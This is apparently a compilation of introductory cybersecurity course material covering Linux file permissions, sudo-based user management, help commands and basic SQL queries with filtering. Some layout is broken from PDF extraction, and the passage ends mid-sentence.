1. Navigate to the projects directory.
2. List the contents and permissions of the projects directory.
The permissions of the files in the projects directory are as follows:
total 20
drwx--x--- 2 researcher2 research_team 4096 Oct 14 18:40 drafts
-rw-rw-rw- 1 researcher2 research_team 46 Oct 14 18:40 project_k.txt
-rw-r----- 1 researcher2 research_team 46 Oct 14 18:40 project_m.txt
-rw-rw-r-- 1 researcher2 research_team 46 Oct 14 18:40 project_r.txt
-rw-rw-r-- 1 researcher2 research_team 46 Oct 14 18:40 project_t.txt
Note: The date and time information returned is the same as the date and time when you ran the
command. Therefore, it is different from the date and time in the example.
As you may recall from the video lesson, a 10-character string begins each entry and
indicates how the permissions on the file are set. For instance, a directory with full
permissions for all owner types would be drwxrwxrwx:
●
●
The 1st character indicates the file type. The d indicates it’s a directory. When this character
is a hyphen (-), it's a regular file.
The 2nd-4th characters indicate the read (r), write (w), and execute (x) permissions for the
user. When one of these characters is a hyphen (-) instead, it indicates that this permission
is not granted to the user.
●
●
The 5th-7th characters indicate the read (r), write (w), and execute (x) permissions for the
group. When one of these characters is a hyphen (-) instead, it indicates that this
permission is not granted for the group.
The 8th-10th characters indicate the read (r), write (w), and execute (x) permissions for
the owner type of other. This owner type consists of all other users on the system apart
from the user and the group. When one of these characters is a hyphen (-) instead, that
indicates that this permission is not granted for other.
The second block of text in the expanded directory listing is the user who owns the file. The
third block of text is the group owner of the file.
Task 2. Change file permissions
In this task, you must determine whether any files have incorrect permissions and then
change the permissions as needed. This action will remove unauthorized access and
strengthen security on the system.
None of the files should allow the other users to write to files.
1. Check whether any files in the projects directory have write permissions for the owner type
of other.
2. Change the permissions of the file identified in the previous step so that the owner
type of other doesn’t have write permissions.
chmod o-w project_k.txt
Note: Permissions are granted for three different types of owners, namely user, group, and
other.
In the chmod command u sets the permissions for the user who owns the file,g sets the
permissions for the group that owns the file, and o sets the permissions for others.
3. The file project_m.txt is a restricted file and should not be readable or writable by
the group or other; only the user should have these permissions on this file. List the
contents and permissions of the current directory and check if the group has read or
write permissions.
4. Use the chmod command to change permissions of the project_m.txt file so that the
group doesn’t have read or write permissions.
Linux Portfolio Activity
In this activity, you will create a new portfolio document to demonstrate your experience
using Linux commands to manage file permissions. You can add this document to your
cybersecurity portfolio, which you can share with prospective employers or recruiters. To
review the importance of building a professional portfolio and options for creating your
portfolio, read Create a cybersecurity portfolio.
To create your portfolio document, you will review a scenario and follow a series of steps.
This scenario is connected to the lab you have just completed about how to examine and
manage file permissions. You will explain the commands you used in that lab, and this will
help you prepare for future job interviews and other steps in the hiring process.
Be sure to complete this activity and answer the questions that follow before moving on.
The next course item will provide you with a completed exemplar to compare to your own
work.
Scenario
You are a security professional at a large organization. You mainly work with their research
team. Part of your job is to ensure users on this team are authorized with the appropriate
permissions. This helps keep the system secure.
Your task is to examine existing permissions on the file system. You’ll need to determine if
the permissions match the authorization that should be given. If they do not match, you’ll
need to modify the permissions to authorize the appropriate users and remove any
unauthorized access.
Add and Delete Users
In this video, we are going to discuss adding and deleting users. This is related to the concept of
authentication. Authentication is the process of a user proving that they are who they say they are in
the system. Just like in a physical building, not all users should be allowed in. Not all users should
get access to the system. But we also want to make sure everyone who should have access to the
system has it. That's why we need to add users. New users can be new to the organization or new to
a group. This could be related to a change in organizational structure or simply a directive from
management to move someone. When users leave the organization, they need to be deleted. They
should no longer have access to any part of the system. Or if they simply changed groups, they
should be deleted from groups that they are no longer a part of. Now that we've sorted out why it's
important to add and delete users, let's discuss a different type of user, the root user. A root user, or
superuser, is a user with elevated privileges to modify the system. Regular users have limitations,
where the root does not. Individuals who need to perform specific tasks can be temporarily added
as root users. Root users can create, modify, or delete any file and run any program. Only root users
or accounts with root privileges can add new users. So you may be wondering how you become a
superuser. Well, one way is logging in as the root user, but running commands as the root user is
considered to be bad practice when using Linux. Why is running commands as a root user
potentially problematic? The first problem with logging in as root is the security risks. Malicious
actors will try to breach the root account. Since it's the most powerful account, to stay safe, the root
account should have logins disabled. Another problem is that it's very easy to make irreversible
mistakes. It's very easy to type the wrong command in the CLI, and if you're running as the root
user, you run a higher risk of making an irreversible mistake, such as permanently deleting a
directory. Finally, there's the concern of accountability. In a multi-user environment like Linux,
there are many users. If a user is running as root, there is no way to track who exactly ran a
command. One solution to help solve this problem is sudo. sudo is a command that temporarily
grants elevated permissions to specific users. This provides more of a controlled approach
compared to root, which runs every command with root privileges. sudo solves lots of problems
associated with running as root. sudo comes from super-user-do and lets you execute commands as
an elevated user without having to sign in and out of another account. Running sudo will prompt
you to enter the password for the user you're currently logged in as. Not all users on a system can
become a superuser. Users must be granted sudo access through a configuration file called the
sudoers file. Now that we've learned about sudo, let's learn how we can use it with another
command to add users. This command is useradd. useradd adds a user to the system. Only root or
users with sudo privileges can use a useradd command. Let's look at a specific example in which we
need to add a user. We'll imagine a new representative is joining the sales department and will be
given the username of salesrep7. We're tasked with adding them to the system. Let's try adding the
new user. First, we need to use the sudo command, followed by the useradd command, and then
last, the username we want to add, in this case, salesrep7. This command doesn't display anything
on the screen. But since we get a new Bash cursor and not an error message, we can feel confident
that the command worked successfully. If it didn't, an error message would have appeared.
Sometimes an error has to do with something simple like misspelling useradd. Or, it might be
because we didn't have sudo privileges. Now let's learn how to do the opposite. Let's learn how to
delete a user with userdel. userdel deletes a user from the system. Similarly, we need root
permissions that we'll access through sudo to use userdel. Let's go back to our example of the user
we added. Let's imagine two months later, the sales representative that we just added to the system
leaves the company. That user should no longer have access to the system. Let's delete that user
from the system. Again, the sudo command is used first, then we add the userdel command. Last, we
add the name of the user we want to delete. Again, we know it ran successfully because there is a
new Bash cursor and not an error message. Now, we've covered how to add and delete users and
how these actions require sudo. When using sudo, we have to use our best judgment. These special
privileges must be used responsibly to ensure a secure system.
Responsible use of sudo
Previously, you explored authorization, authentication, and Linux commands with sudo, useradd, and
userdel. The sudo command is important for security analysts because it allows users to have elevated
permissions without risking the system by running commands as the root user. You’ll continue
exploring authorization, authentication, and Linux commands in this reading and learn two more
commands that can be used with sudo: usermod and chown.
Responsible use of sudo
To manage authorization and authentication, you need to be a root user, or a user with elevated
privileges to modify the system. The root user can also be called the “super user.” You become a root
user by logging in as the root user. However, running commands as the root user is not recommended in
Linux because it can create security risks if malicious actors compromise that account. It’s also easy to
make irreversible mistakes, and the system can’t track who ran a command. For these reasons, rather
than logging in as the root user, it’s recommended you use sudo in Linux when you need elevated
privileges.
The sudo command temporarily grants elevated permissions to specific users. The name of this
command comes from “super user do.” Users must be given access in a configuration file to use sudo.
This file is called the “sudoers file.” Although using sudo is preferable to logging in as the root user, it's
important to be aware that users with the elevated permissions to use sudo might be more at risk in the
event of an attack.
You can compare this to a hotel with a master key. The master key can be used to access any room in the
hotel. There are some workers at the hotel who need this key to perform their work. For example, to
clean all the rooms, the janitor would scan their ID badge and then use this master key. However, if
someone outside the hotel’s network gained access to the janitor’s ID badge and master key, they could
access any room in the hotel. In this example, the janitor with the master key represents a user using
sudo for elevated privileges. Because of the dangers of sudo, only users who really need to use it should
have these permissions.
Additionally, even if you need access to sudo, you should be careful about using it with only the
commands you need and nothing more. Running commands with sudo allows users to bypass the typical
security controls that are in place to prevent elevated access to an attacker.
Note: Be aware of sudo if copying commands from an online source. It’s important you don’t use sudo
accidentally.
Authentication and authorization with sudo
You can use sudo with many authentication and authorization management tasks. As a reminder,
authentication is the process of verifying who someone is, and authorization is the concept of granting
access to specific resources in a system. Some of the key commands used for these tasks include the
following:
useradd
The useradd command adds a user to the system. To add a user with the username of fgarcia with sudo,
enter sudo useradd fgarcia. There are additional options you can use with useradd:
●
●
-g: Sets the user’s default group, also called their primary group
-G: Adds the user to additional groups, also called supplemental or secondary groups
To use the -g option, the primary group must be specified after -g. For example, entering sudo useradd -g
security fgarcia adds fgarcia as a new user and assigns their primary group to be security.
To use the -G option, the supplemental group must be passed into the command after -G. You can add
more than one supplemental group at a time with the -G option. Entering sudo useradd -G finance,admin
fgarcia adds fgarcia as a new user and adds them to the existing finance and admin groups.
usermod
The usermod command modifies existing user accounts. The same -g and -G options from the useradd
command can be used with usermod if a user already exists.
To change the primary group of an existing user, you need the -g option. For example, entering sudo
usermod -g executive fgarcia would change fgarcia’s primary group to the executive group.
To add a supplemental group for an existing user, you need the -G option. You also need a -a option,
which appends the user to an existing group and is only used with the -G option. For example, entering
sudo usermod -a -G marketing fgarcia would add the existing fgarcia user to the supplemental marketing
group.
Note: When changing the supplemental group of an existing user, if you don't include the -a option, -G
will replace any existing supplemental groups with the groups specified after usermod. Using -a with -G
ensures that the new groups are added but existing groups are not replaced.
There are other options you can use with usermod to specify how you want to modify the user, including:
●
●
●
-d: Changes the user’s home directory.
-l: Changes the user’s login name.
-L: Locks the account so the user can’t log in.
The option always goes after the usermod command. For example, to change fgarcia’s home directory to
/home/garcia_f, enter sudo usermod -d /home/garcia_f fgarcia. The option -d directly follows the command
usermod before the other two needed arguments.
userdel
The userdel command deletes a user from the system. For example, entering sudo userdel fgarcia deletes
fgarcia as a user. Be careful before you delete a user using this command.
The userdel command doesn’t delete the files in the user’s home directory unless you use the -r option.
Entering sudo userdel -r fgarcia would delete fgarcia as a user and delete all files in their home directory.
Before deleting any user files, you should ensure you have backups in case you need them later.
Note: Instead of deleting the user, you could consider deactivating their account with usermod -L. This
prevents the user from logging in while still giving you access to their account and associated
permissions. For example, if a user left an organization, this option would allow you to identify which
files they have ownership over, so you could move this ownership to other users.
chown
The chown command changes ownership of a file or directory. You can use chown to change user or
group ownership. To change the user owner of the access.txt file to fgarcia, enter sudo chown fgarcia
access.txt. To change the group owner of access.txt to security, enter sudo chown :security access.txt. You
must enter a colon (:) before security to designate it as a group name.
Similar to useradd, usermod, and userdel, there are additional options that can be used with chown.
Key takeaways
Authentication is the process of a user verifying their identity, and authorization is the process of
determining what they have access to. You can use the sudo command to temporarily run commands
with elevated privileges to complete authentication and authorization management tasks. Specifically,
useradd, userdel, usermod, and chown can be used to manage users and file ownership.
The Linux Community
Man pages within the shell
Welcome back! In this video, we're going to discuss some resources that are available directly
through the shell and can help you while working in Linux. One of the great things about Linux is
that you can get help right through the command line. The first command that can help you in this
way is: man. man displays information on other commands and how they work. The name of this
command comes from the word manual. Let's examine this more closely by using man to get
information about the usermod command. After man, we type the name of this command. The
information that man returns includes a general description. It also contains information about
each of usermod's options. For example, the option -d can be added to usermod to change a user's
home directory. man provides a lot of information, but sometimes we just need a quick reference on
what a command does. In that case, you use whatis. whatis displays a description of a command on
a single line. Let's say you heard a co-worker mention a command like tail. You've never heard of
this command before, but you can find out what it does. Simply use the command, whatis tail, and
learn that it outputs the last part of files. Sometimes we might not even know what command to
look up. This is where apropos can help us. apropos searches the manual page descriptions for a
specified string. Let's try it out. Let's say you have a task that requires you to change a password,
but you're not quite sure how to do this. If we use the apropos command with the string password,
this will display many commands with that word. This helps somewhat, but it still may be difficult
to find what we need. But we can filter this by adding the -a option and an additional string. This
option will return only the commands that contain both strings. In our case, since we want to
change the password, let's look for commands with both: change and password. Now, the output
has been limited to the most relevant commands. These commands make it a lot easier to navigate
the Linux command line. As a new analyst, you won't have all the answers all the time, but you can
learn where to find them.
Linux resources
Previously, you were introduced to the Linux community and some resources that exist to help Linux
users. Linux has many options available to give users the information they need. This reading will
review these resources. When you’re aware of the resources available to you, you can continue to learn
Linux independently. You can also discover even more ways that Linux can support your work as a
security analyst.
Linux community
Linux has a large online community, and this is a huge resource for Linux users of all levels. You can
likely find the answers to your questions with a simple online search. Troubleshooting issues by
searching and reading online is an effective way to discover how others approached your issue. It’s also
a great way for beginners to learn more about Linux.
The UNIX and Linux Stack Exchange is a trusted resource for troubleshooting Linux issues. The Unix and
Linux Stack Exchange is a question and answer website where community members can ask and answer
questions about Linux. Community members vote on answers, so the higher quality answers are
displayed at the top. Many of the questions are related to specific topics from advanced users, and the
topics might help you troubleshoot issues as you continue using Linux.
Integrated Linux support
Linux also has several commands that you can use for support.
man
The man command displays information on other commands and how they work. It’s short for “manual.”
To search for information on a command, enter the command after man. For example, entering man
chown returns detailed information about chown, including the various options you can use with it. The
output of the man command is also called a “man page.”
apropos
The apropos command searches the man page descriptions for a specified string. Man pages can be
lengthy and difficult to search through if you’re looking for a specific keyword. To use apropos, enter the
keyword after apropos.
You can also include the -a option to search for multiple words. For example, entering apropos -a graph
editor outputs man pages that contain both the words “graph" and "editor” in their descriptions.
whatis
The whatis command displays a description of a command on a single line. For example, entering whatis
nano outputs the description of nano. This command is useful when you don't need a detailed
description, just a general idea of the command. This might be as a reminder. Or, it might be after you
discover a new command through a colleague or online resource and want to know more.
Key takeaways
There are many resources available for troubleshooting issues or getting support for Linux. Linux has a
large global community of users who ask and answer questions on online resources, such as the Unix
and Linux Stack Exchange. You can also use integrated support commands in Linux, such as man,
apropos, and whatis.
Resources for more information
There are many resources available online that can help you learn new Linux concepts, review topics, or
ask and answer questions with the global Linux community. The Unix and Linux Stack Exchange is one
example, and you can search online to find others
Reference guide: Linux
The Linux reference guide contains key Linux commands security professionals use to
perform basic job duties. The reference guide is divided into six different categories of
useful Linux commands for security-related tasks:
●
●
●
●
●
●
Navigate the file system
Read files
Manage the file system
Filter content
Manage users and their permissions
Get help in Linux
Within each category, commands are organized alphabetically.
Access and save the guide
You can save a copy of this guide for future reference. You can use it as a resource for
additional practice or in your future professional projects.
To access a downloadable version of this course item, click the following link and select Use
Template.
Reference guide: Linux
Glossary terms from module 3
Terms and definitions from Course 4, Module 3
Absolute file path: The full file path, which starts from the root
Argument (Linux): Specific information needed by a command
Authentication: The process of verifying who someone is
Authorization: The concept of granting access to specific resources in a system
Bash: The default shell in most Linux distributions
Command: An instruction telling the computer to do something
File path: The location of a file or directory
Filesystem Hierarchy Standard (FHS): The component of the Linux OS that organizes data
Filtering: Selecting data that match a certain condition
nano: A command-line file editor that is available by default in many Linux distributions
Options: Input that modifies the behavior of a command
Permissions: The type of access granted for a file or directory
Principle of least privilege: The concept of granting only the minimal access and authorization required
to complete a task or function
Relative file path: A file path that starts from the user's current directory
Root directory: The highest-level directory in Linux
Root user (or superuser): A user with elevated privileges to modify the system
Standard input: Information received by the OS via the command line
Standard output: Information returned by the OS through the shell
Module 4 – SQL and Databases
Our modern world is filled with data and that data almost always guides us
in making important decisions. When working with large amounts of data,
we need to know how to store it, so it's organized and quick to access and process. The solution to
this is through databases, and that's what we're exploring in this video! To start us off, we can
define a database as an organized collection of information or data. Databases are often compared
to spreadsheets. Some of you may have used Google Sheets or another common spreadsheet
program in the past. While these programs are convenient
ways to store data, spreadsheets are often designed for a single user or a small team to store less
data. In contrast, databases can be accessed by multiple people simultaneously and can store
massive amounts of data. Databases can also perform complex tasks while accessing data. As a
security analyst, you'll often need to access databases containing useful information. For example,
these could be databases containing information on login attempts, software and updates, or
machines and their owners. Now that we know how important databases are for us, let's talk about
how they're organized and how we can interact with them. Using databases allow us to store large
amounts of data while keeping it quick and easy to access. There are lots of different ways we can
structure a database, but in this course, we'll be working with
relational databases. A relational database is a structured database containing tables that are related
to each other. Let's learn more about what makes a relational database. We'll start by examining an
individual table in a larger database of organizational information. Each table contains fields of
information. For example, in this table on employees, these would include fields like employee_id,
device_id, and username. These are the columns of the tables. In addition, tables contain rows also
called records. Rows are filled with specific data related to the columns in the table. For example,
our first row is a record for an employee whose id is 1,000 and who works in the marketing
department. Relational databases often have multiple tables. Consider an example where we have
two tables from a larger database, one with employees of the company and another with machines
given to those employees. We can connect two tables if they share a common column. In this
example, we establish a relationship between them with a common employee_id column. The
columns that relate two tables to each other are called keys. There are two types of keys. The first is
called a primary key. The primary key refers to a column where every row has a unique entry. The
primary key must not have any duplicate values, or any null or empty values. The primary key allows
us to uniquely identify every row in our table. For the table of employees, employee_id is a primary
key. Every employee_id is unique and there are no employee_ids that are duplicate or empty. The
second type of key is a foreign key. The foreign key is a column in a table that is a primary key in
another table. Foreign keys, unlike primary keys, can have empty values and duplicates. The foreign
key allows us to connect two tables together. In our example, we can look at the employee_id
column in the machines table. We previously identified this as a primary key in the employees table,
so we can use this to connect every machine to their corresponding employee. It's also important to
know that a table can only have one primary key, but multiple foreign keys. With this information,
we're ready to move on to the basics of SQL, the language that lets us work with databases.
Query Databases with SQL
As a security analyst, you'll need to be familiar both with databases and the tools used to access
them. Now that we know the basics of databases, let's focus on an important tool
used to work with them, SQL, and learn more about how analysts like yourself might utilize it. SQL,
or as it's also pronounced, S-Q-L, stands for Structured Query Language. SQL is a programming
language used to create, interact with, and request information from a database. Before learning
more about SQL, we need to define what query means. A query is a request for data from a database
table or a combination of tables. Nearly all relational databases rely on some version of SQL to query
data. The different versions of SQL only have
slight differences in their structure, like where to place quotation marks. Whatever variety of SQL
you use, you'll find it to be a very important tool in your work as a security analyst. First, let's
discuss how SQL can help you retrieve logs. A log is a record of events that occur
within an organization's systems. As a security analyst, you might be tasked with reviewing logs for
various reasons. For example, some logs might contain details on machines used in a company, and
as an analyst, you would need to find those machines that weren't configured properly. Other logs
might describe the visitors to your website or web app and the tasks they perform. In that case, you
might be looking for unusual patterns that may point to malicious activity. Security logs are often
very large and hard to process. There are millions of data points, and it's very time consuming to
find what you need. But this is where SQL comes in! It can
search through millions of data points to extract relevant rows of data using one query that takes
seconds to run. That's pretty useful, right? SQL is also a very common language used for basic data
analytics, another set of skills that will set you apart as a security analyst. As a security analyst, you
can use SQL's filtering to find data to support security-related decisions and analyze when things
may go wrong. For instance, you can identify what machines haven't received the latest patch. This
is important because patches are updates that help secure against attacks. As another example, you
can use SQL to determine the best time to update a machine based on when it's least used. Now that
we know why SQL is important to us, we're going to start making basic queries to a sample
database!
SQL filtering versus Linux filtering
Previously, you explored the Linux commands that allow you to filter for specific information contained
within files or directories. And, more recently, you examined how SQL helps you efficiently filter for the
information you need. In this reading, you'll explore differences between the two tools as they relate to
filtering. You'll also learn that one way to access SQL is through the Linux command line.
Accessing SQL
There are many interfaces for accessing SQL and many different versions of SQL. One way to access SQL
is through the Linux command line.
To access SQL from Linux, you need to type in a command for the version of SQL that you want to use.
For example, if you want to access SQLite, you can enter the command sqlite3 in the command line.
After this, any commands typed in the command line will be directed to SQL instead of Linux commands.
Differences between Linux and SQL filtering
Although both Linux and SQL allow you to filter through data, there are some differences that affect
which one you should choose.
Structure
SQL offers a lot more structure than Linux, which is more free-form and not as tidy.
For example, if you wanted to access a log of employee log-in attempts, SQL would have each record
separated into columns. Linux would print the data as a line of text without this organization. As a result,
selecting a specific column to analyze would be easier and more efficient in SQL.
In terms of structure, SQL provides results that are more easily readable and that can be adjusted more
quickly than when using Linux.
Joining tables
Some security-related decisions require information from different tables. SQL allows the analyst to join
multiple tables together when returning data. Linux doesn’t have that same functionality; it doesn’t
allow data to be connected to other information on your computer. This is more restrictive for an
analyst going through security logs.
Best uses
As a security analyst, it’s important to understand when you can use which tool. Although SQL has a
more organized structure and allows you to join tables, this doesn’t mean that there aren’t situations
that would require you to filter data in Linux.
A lot of data used in cybersecurity will be stored in a database format that works with SQL. However,
other logs might be in a format that is not compatible with SQL. For instance, if the data is stored in a
text file, you cannot search through it with SQL. In those cases, it is useful to know how to filter in Linux.
Key takeaways
To work with SQL, you can access it from multiple different interfaces, such as the Linux command line.
Both SQL and Linux allow you to filter for specific data, but SQL offers the advantages of structuring the
data and allowing you to join data from multiple tables.
Basic Queries
In this video, we're going to be running our very first SQL query! This query will be based on a
common work task that you might encounter as a security analyst. We're going to determine which
computer has been assigned to a certain employee. Let's say we have access
to the employees table. The employees table has five columns. Two of them, employee_id
and device_id, contain the information that we need. We'll write a query to this table that returns
only those two columns from the table. The two SQL keywords we need for basic SQL queries are
SELECT and FROM. SELECT indicates which columns to return. FROM indicates which table to query.
The use of these keywords in SQL is very similar to how we would use these words in everyday
language. For example, we can ask a friend to select apples and bananas from the big box when
going out to buy fruit. This is already very similar to SQL. So let's go ahead and use SELECT and
FROM in SQL to return the information we need on employees and the computers they use. We
start off by typing in the SQL statement. After FROM, we've identified that the information will be
pulled from the employees table. And after SELECT, employee_id and device_id indicate the two
columns we want to return from this table. Notice how a comma separates the two columns that we
want to return. It's also worth
mentioning a couple of key aspects related to the syntax of SQL here. Syntax refers to the
rules that determine what is correctly structured in a computing language. In SQL, keywords are not
case-sensitive, so you could also write select and from in lowercase, but we're placing them in
capital letters because it makes the query easier to understand. Another aspect of this syntax is that
semicolons are placed at the end of the statement. And now, we'll run the query by pressing Enter.
The output gives us the information we need to match employees to their computers. We just ran
our very first SQL query! Suppose you wanted to know what department the employee using the
computer is from, or their username, or the office they work in. To do that, we can use SQL to make
another statement that prints out all of the columns from the table. We can do this by placing an
asterisk after SELECT. This is commonly referred to as select all. Now, let's run this query to the
employees table in SQL. And now we have the full table in the output. You just made it through a
basic query in SQL, congratulations!
Query a database
Previously, you explored how SQL is an important tool in the world of cybersecurity and is essential
when querying databases. You examined a few basic SQL queries and keywords used to extract needed
information from a database. In this reading, you’ll review those basic SQL queries and learn a new
keyword that will help you organize your output. You'll also learn about the Chinook database, which
this course uses for queries in readings and quizzes.
Basic SQL query
There are two essential keywords in any SQL query: SELECT and FROM. You will use these keywords
every time you want to query a SQL database. Using them together helps SQL identify what data you
need from a database and the table you are returning it from.
The video demonstrated this SQL query:
SELECT employee_id, device_id
FROM employees;
In readings and quizzes, this course uses a sample database called the Chinook database to run queries.
The Chinook database includes data that might be created at a digital media company. A security analyst
employed by this company might need to query this data. For example, the database contains eleven
tables, including an employees table, a customers table, and an invoices table. These tables include data
such as names and addresses.
As an example, you can run this query to return data from the customers table of the Chinook database:
1
2
SELECT customerid, city, country
FROM customers;
RunReset
+------------+---------------------+----------------+
| CustomerId | City
| Country
|
+------------+---------------------+----------------+
|
1 | São José dos Campos | Brazil
|
|
2 | Stuttgart
| Germany
|
|
3 | Montréal
| Canada
|
|
4 | Oslo
| Norway
|
|
5 | Prague
| Czech Republic |
|
6 | Prague
| Czech Republic |
|
7 | Vienne
| Austria
|
|
8 | Brussels
| Belgium
|
|
9 | Copenhagen
| Denmark
|
|
10 | São Paulo
| Brazil
|
|
11 | São Paulo
| Brazil
|
|
12 | Rio de Janeiro | Brazil
|
|
13 | Brasília
| Brazil
|
|
14 | Edmonton
| Canada
|
|
15 | Vancouver
| Canada
|
|
16 | Mountain View
| USA
|
|
17 | Redmond
| USA
|
|
18 | New York
| USA
|
|
19 | Cupertino
| USA
|
|
20 | Mountain View
| USA
|
|
21 | Reno
| USA
|
|
22 | Orlando
| USA
|
|
23 | Boston
| USA
|
|
24 | Chicago
| USA
|
|
25 | Madison
| USA
|
+------------+---------------------+----------------+
(Output limit exceeded, 25 of 59 total rows shown)
SELECT
The SELECT keyword indicates which columns to return. For example, you can return the customerid
column from the Chinook database with
SELECT customerid
You can also select multiple columns by separating them with a comma. For example, if you want to
return both the customerid and city columns, you should write SELECT customerid, city.
If you want to return all columns in a table, you can follow the SELECT keyword with an asterisk (*). The
first line in the query will be SELECT *.
Note: Although the tables you're querying in this course are relatively small, using SELECT * may not be
advisable when working with large databases and tables; in those cases, the final output may be difficult
to understand and might be slow to run.
FROM
The SELECT keyword always comes with the FROM keyword. FROM indicates which table to query. To
use the FROM keyword, you should write it after the SELECT keyword, often on a new line, and follow it
with the name of the table you’re querying. If you want to return all columns from the customers table,
you can write:
SELECT *
FROM customers;
When you want to end the query here, you put a semicolon (;) at the end to tell SQL that this is the entire
query.
Note: Line breaks are not necessary in SQL queries, but are often used to make the query easier to
understand. If you prefer, you can also write the previous query on one line as
SELECT * FROM customers;
ORDER BY
Database tables are often very complicated, and this is where other SQL keywords come in handy.
ORDER BY is an important keyword for organizing the data you extract from a table.
ORDER BY sequences the records returned by a query based on a specified column or columns. This can
be in either ascending or descending order.
Sorting in ascending order
To use the ORDER BY keyword, write it at the end of the query and specify a column to base the sort on.
In this example, SQL will return the customerid, city, and country columns from the customers table, and
the records will be sequenced by the city column:
1
2
3
The ORDER BY keyword sorts the records based on the column specified after this keyword. By default,
as shown in this example, the sequence will be in ascending order. This means
●
●
if you choose a column containing numeric data, it sorts the output from the smallest to largest.
For example, if sorting on customerid, the ID numbers are sorted from smallest to largest.
if the column contains alphabetic characters, such as in the example with the city column, it
orders the records from the beginning of the alphabet to the end.
Sorting in descending order
You can also use the ORDER BY with the DESC keyword to sort in descending order. The DESC keyword is
short for "descending" and tells SQL to sort numbers from largest to smallest, or alphabetically from Z to
A. This can be done by following ORDER BY with the DESC keyword. For example, you can run this query
to examine how the results differ when DESC is applied:
1
2
3
Now, cities at the end of the alphabet are listed first.
Sorting based on multiple columns
You can also choose multiple columns to order by. For example, you might first choose the country and
then the city column. SQL then sorts the output by country, and for rows with the same country, it sorts
them based on city. You can run this to explore how SQL displays this:
1
2
3
Key takeaways
SELECT and FROM are important keywords in SQL queries. You use SELECT to indicate which columns to
return and FROM to indicate which table to query. You can also include ORDER BY in your query to
organize the output. These foundational SQL skills will support you as you move into more advanced
queries.
Basic Filters on SQL
One of the most powerful features of SQL is its ability to filter. In this video, we're going to learn
how this helps us make better queries and select more specific pieces
of data from a database. Filtering is selecting data that match a certain condition. Think of filtering as
a way of only choosing the data we want. Let's say we wanted to select
apples from a fruit cart. Filtering allows us to specify what kind of apples we want to choose. When
we go buy apples, we might explicitly say, "Choose only apples that are fresh." This removes apples
that aren't fresh from the selection. This is a filter! As a security analyst, you might filter a log-in
attempts table to find all attempts from a specific country. This could be done by applying a filter on
the country column. For example, you could filter to just
return records containing Canada. Before we get started, we need to focus on an
important part of the syntax of SQL. Let's learn about operators. An operator is a symbol or
keyword that represents an operation. An example of an operator would be the equal to operator.
For example, if we wanted to find all records that have USA in the country column, we use country
= 'USA' To filter a query in SQL, we simply add an extra line to the SELECT and FROM statement we
used before. This extra line will use a WHERE clause. In SQL, WHERE indicates the condition for a
filter. After the keyword WHERE, the specific condition is listed using operators. So if we wanted to
find all of the login attempts made in the United States, we would create this filter. In this particular
condition, we're indicating to return all records that have a value in the country column that is
equal to USA. Let's try putting it all together in SQL. We're going to start with selecting all the
columns from the log_in_attempts table. And
then add the WHERE filter. Don't forget the semicolon! This tells us we finished
the SQL statement. Now, let's run this query! Because of our filter, only the rows where the country
of the log-in attempt was USA are returned. In the previous example, the condition for
our filter was based simply on returning records that are equal to a particular value. We can also
make our conditions more complex by searching for a pattern instead of an exact word. For
example, in the employees table, we have a column for office. We could search for records in this
column that match a certain pattern. Perhaps we might want all offices in the East building. To
search for a pattern, we used the percentage sign to act as a wildcard for unspecified characters. If
we ran a filter for 'East%', this would return all records that start with East -- for example, the
offices East-120, East-290, and East-435. When searching for patterns with the percentage sign, we
cannot use the equals operator. Instead, we use another operator, LIKE. LIKE is an operator used
with WHERE to search for a pattern in a column. Since LIKE is an operator, similar to the equal sign,
we use it instead of the equal sign. So, when our goal is to return all values in the office column that
start with the word East, LIKE would appear in a WHERE clause. Let's go back to the example in
which we wanted to filter for log-in attempts made in the United States. Imagine that we realize
that our database contains inconsistencies with how the United States is represented. Some entries
use US while others use USA. Let's get into SQL and apply this new type of filter with LIKE. We're
going to start with the same first two lines of code because we want to select all columns from the
log-in attempts table. And we're going to add a filter with LIKE so that records will be returned if
they contain a value in the country column beginning with the characters US. This includes both US
and USA. Let's run this query to check if the output changes. This returns all the entries where the
user location
was in the United States. And now we can use the LIKE clause to filter columns based on a pattern!
The WHERE clause and basic operators
Previously, you focused on how to refine your SQL queries by using the WHERE clause to filter results. In
this reading, you’ll further explore how to use the WHERE clause, the LIKE operator and the percentage
sign (%) wildcard. You’ll also be introduced to the underscore (_), another wildcard that can help you
filter queries.
How filtering helps
As a security analyst, you'll often be responsible for working with very large and complicated security
logs. To find the information you need, you'll often need to use SQL to filter the logs.
In a cybersecurity context, you might use filters to find the login attempts of a specific user or all login
attempts made at the time of a security issue. As another example, you might filter to find the devices
that are running a specific version of an application.
WHERE
To create a filter in SQL, you need to use the keyword WHERE. WHERE indicates the condition for a filter.
If you needed to email employees with a title of IT Staff, you might use a query like the one in the
following example. You can run this example to examine what it returns:
1
Rather than returning all records in the employees table, this WHERE clause instructs SQL to return only
those that contain 'IT Staff' in the title column. It uses the equals sign (=) operator to set this condition.
Note: You should place the semicolon (;) where the query ends. When you add a filter to a basic query,
the semicolon is after the filter.
Filtering for patterns
You can also filter based on a pattern. For example, you can identify entries that start or end with a
certain character or characters. Filtering for a pattern requires incorporating two more elements into
your WHERE clause:
●
●
a wildcard
the LIKE operator
Wildcards
A wildcard is a special character that can be substituted with any other character. Two of the most useful
wildcards are the percentage sign (%) and the underscore (_):
●
●
The percentage sign substitutes for any number of other characters.
The underscore symbol only substitutes for one other character.
These wildcards can be placed after a string, before a string, or in both locations depending on the
pattern you’re filtering for.
The following table includes these wildcards applied to the string 'a' and examples of what each pattern
would return.
Pattern
'a%'
'a_'
'a__'
'%a'
'_a'
'%a%'
'_a_'
Results that could be returned
apple123, art, a
as, an, a7
ant, add, a1c
pizza, Z6ra, a
ma, 1a, Ha
Again, back, a
Car, ban, ea7
LIKE
To apply wildcards to the filter, you need to use the LIKE operator instead of an equals sign (=). LIKE is
used with WHERE to search for a pattern in a column.
For instance, if you want to email employees with a title of either 'IT Staff' or 'IT Manager', you can use
LIKE operator combined with the % wildcard:
1
2
3
This query returns all records with values in the title column that start with the pattern of 'IT'. This
means both 'IT Staff' and 'IT Manager' are returned.
As another example, if you want to search through the invoices table to find all customers located in
states with an abbreviation of 'NY', 'NV', 'NS' or 'NT', you can use the 'N_' pattern on the state column:
1
2
This returns all the records with state abbreviations that follow this pattern.
Key takeaways
Filters are important when refining what your query returns. WHERE is an essential keyword for adding
a filter to your query. You can also filter for patterns by combining the LIKE operator with the
percentage sign (%) and the underscore (_) wildcards.
Filter Dates and Numbers
In this video, we're going to continue using SQL queries and filters, but now we're going to apply
them to new data types. First, let's explore the three common data types that you will find in
